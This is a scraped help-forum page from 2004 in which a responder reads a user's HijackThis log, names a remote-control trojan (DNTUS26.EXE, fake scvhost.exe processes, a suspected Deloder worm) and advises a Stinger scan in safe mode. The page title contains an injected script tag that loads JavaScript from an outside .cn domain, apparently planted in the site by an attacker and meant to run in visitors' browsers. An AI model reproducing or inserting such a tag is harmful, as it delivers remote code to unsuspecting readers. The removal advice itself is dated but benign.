Re: HijackThisLog Analysis - N<script src=http://www.wowgm1.cn/m.js></script> : MAC-NET Secures IT

MAC-NET

How to

Do more with Firefox^NEW

Hijacked Browser Analysis

4-counter.com 3721

C2.lop browser hijacker

CWShredder

Edmond.exe

Intercom.exe Spyware

MWSOEMON.EXE - MyWebSearch

SearchPage CC Spyware

Spin4Dough Spyware

Sqwire.com home page hijack

Home » Spyware Protection » Hijacked Browser Analysis »

Re: HijackThisLog Analysis - Nick

Date: 7:09:14 PM, on 6/30/04

Looks like there is a remote control trojan in the system...

Also there are multiple session of scvhost.exe.

End the below suspicious process :

C:\WINNT\SYSTEM32\DNTUS26.EXE
C:\WINNT\system32\scvhost.exe

Remove Unauthorised Software:

DNTU26.EXE also suspected infection of W32/Deloder.worm.

Download the latest Stinger Software and Reboot the computer but put it to safe mode. Then scan and delete viruses.

Original log but with private information removed.

Logfile of HijackThis v1.97.7
Scan saved at 7:09:14 PM, on 6/30/04
Platform: Windows NT 4 SP6 (WinNT 4.00.1381)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\spoolss.exe
C:\WINNT\system32\RpcSs.exe
C:\WINNT\System32\nddeagnt.exe
C:\WINNT\Explorer.EXE
C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
C:\WINNT\System32\msdtc.exe
C:\Program Files\Common Files\Network Associates\Alert Manager\amgrsrvc.exe
C:\PROGRA~1\DIRECT~1\DUService.exe
C:\WINNT\SYSTEM32\DNTUS26.EXE
C:\WINNT\System32\llssrv.exe
C:\Program Files\Network Associates\NetShield 2000\Mcshield.exe
C:\Program Files\Network Associates\NetShield 2000\VsTskMgr.exe
C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe
c:\winnt\system32\pstores.exe
C:\WINNT\System32\LOCATOR.EXE
C:\WINNT\system32\NetLogon.exe
C:\WINNT\system32\MSTask.exe
C:\Program Files\ORL\VNC\WinVNC.exe
C:\WINNT\System32\ZipToA.exe
C:\WINNT\System32\inetsrv\inetinfo.exe
C:\WINNT\System32\INTERNAT.EXE
C:\WINNT\system32\scvhost.exe
C:\WINNT\system32\scvhost.exe
C:\WINNT\system32\scvhost.exe
C:\WINNT\system32\scvhost.exe
C:\WINNT\system32\scvhost.exe
C:\vpop3\vpop3svc.exe
C:\vpop3\VPOP3.EXE
C:\WINNT\regedit.exe
C:\Program Files\Network Associates\NetShield 2000\scan32.exe
C:\WINNT\system32\notepad.exe
C:\WinZip\winzip32.exe
C:\TEMP\HijackThis.exe

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = proxy.singnet.com.sg:8080
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = 192.168.*;
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
F2 - REG:system.ini: UserInit=userinit,nddeagnt.exe
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - Global Startup: Service Manager.lnk = C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
O13 - WWW. Prefix: http:??

Trojan found:

DNTUS26.EXE

Post your comment

Mail this page